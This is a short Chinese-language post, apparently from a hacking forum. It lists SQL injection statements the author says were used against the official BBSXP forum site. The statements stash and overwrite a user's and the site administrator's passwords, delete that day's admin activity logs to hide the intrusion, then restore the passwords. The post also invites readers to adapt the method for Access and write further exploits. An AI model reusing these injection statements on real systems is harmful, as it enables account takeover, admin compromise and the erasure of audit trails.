这里是我测试bbsxp官方网站时使用几个查询语句，供大家参考使用：

--备份yuzi的密码到电子邮件中 update BBSXP_Users set UserMail=UserPass where UserName='yuzi' --备份后台管理密码到yuzi的个人主页中 update BBSXP_Users set UserHome=(select top 1 AdminPassword from BBSXP_SiteSettings) where UserName='yuzi' --修改yuzi的密码为xxxxxxxxxxxxxxxxx update BBSXP_Users set UserPass='xxxxxxxxxxxxxxxxx' where UserName='yuzi' --修改后台管理密码为xxxxxxxxxxxxxxxxx update BBSXP_SiteSettings set AdminPassword=' xxxxxxxxxxxxxxxxx ' --删除管理员今天登录时所有的操作日志 delete from BBSXP_Log where UserName='yuzi' and cast(DateCreated as nvarchar(10))=cast(getdate() as nvarchar(10)) --恢复后台管理密码 update BBSXP_SiteSettings set AdminPassword=(select UserHome from BBSXP_Users where UserName='yuzi') --恢复yuzi的密码 update BBSXP_Users set UserPass=UserMail where UserName='yuzi' --清除作为密码备份的yuzi的电子邮件和个人主页数据 update BBSXP_Users set UserMail='' where UserName='yuzi' update BBSXP_Users set UserHome='' where UserName='yuzi'

在这篇文章中虽然我只是给出了针对SqlServer数据库的注入方法，如果在Exploit中使用针对Access的注入语句的话也是可以的。由于时间关系我也就没有详细的写相关的注入语句，有兴趣的读者可以试一试自己来完成对Access数据库的注入。还有针对NewTopic.asp和ReTopic.asp两个文件注入的Exploit我也就不再写了，基本上大同小异。如果你有兴趣的话也可以自己写一下给大家分享。